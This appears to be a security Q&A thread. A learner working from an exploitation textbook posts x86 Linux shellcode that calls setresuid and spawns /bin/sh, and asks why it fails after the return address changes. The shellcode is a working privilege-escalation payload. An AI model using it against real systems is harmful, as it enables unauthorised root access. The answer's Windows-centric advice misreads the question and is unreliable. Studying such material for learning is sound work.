1

I'm learning exploits from the book Hacking: The Art of Exploitation. The shellcode below was written to enable higher privilege access to files.

\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80
\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62
\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80

However it sounds the shellcode doesn't work for the addresses, on my computer (with NOP sled) 0xffffd9e2 repeated 40 times since the author wrote the shellcode in the book for 0xbffff6f6. I wonder if I need to write a specific shellcode for 0xffffd9e2.

Gilles 'SO- stop being evil'
  • 50,912
  • 13
  • 120
  • 179
b3l4rus
  • 11
  • 2
  • Is the stack executable? Have you confirmed the shellcode gets executed (use gdb)? – Zzz Jul 06 '12 at 11:45

1 Answers1

3

In Windows, there can be a problem with kernel adresses. Each service pack has different kernel addresses. I'd suggest taking "cross platform" shellcode from exploit-db.com or packetstormsecurity.org

Jeff Ferland
  • 38,090
  • 9
  • 93
  • 171
user1106128
  • 149
  • 3